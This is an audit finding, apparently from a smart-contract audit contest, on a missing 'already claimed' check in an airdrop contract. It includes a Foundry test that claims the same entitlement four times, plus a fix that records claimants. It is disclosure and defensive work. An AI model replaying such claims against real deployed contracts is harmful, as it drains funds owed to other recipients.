Submission Details
Severity: high
Valid

Multiple Claiming

Summary

A mischievous collector can claim multiple times.

Vulnerability Details

The claim function never checks whether a collector has already claimed their entitlement. As a result, a mischievous collector can call the claim function with the same arguments (account, amount and proof) multiple times and drain the smart contract of all its funds.

Impact

One collector can claim all the airdropped funds, leaving nothing for the other collectors.

Tools Used

The following Foundry test shows how this bug can be easily exploited:

    function testUsersCanClaimMultipleTimes() public {
        uint256 startingBalance = token.balanceOf(collectorOne);
        // Fund the collector with enough ETH to pay the claim fee four times.
        vm.deal(collectorOne, 4 * airdrop.getFee());
        vm.startPrank(collectorOne);
        // Same account, same amount, same proof: every call succeeds.
        for (uint256 i = 0; i < 4; i++) {
            airdrop.claim{value: airdrop.getFee()}(
                collectorOne,
                amountToCollect,
                proof
            );
        }
        vm.stopPrank();
        uint256 endingBalance = token.balanceOf(collectorOne);
        // The collector received four times their entitlement.
        assertEq(endingBalance - startingBalance, amountToCollect * 4);
    }

Recommendations

To fix this issue, you should implement a mapping that records which collectors have already claimed their funds, and check it in the claim function so that a repeated claim is rejected. This will prevent them from claiming multiple times.

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

multi-claim-airdrop
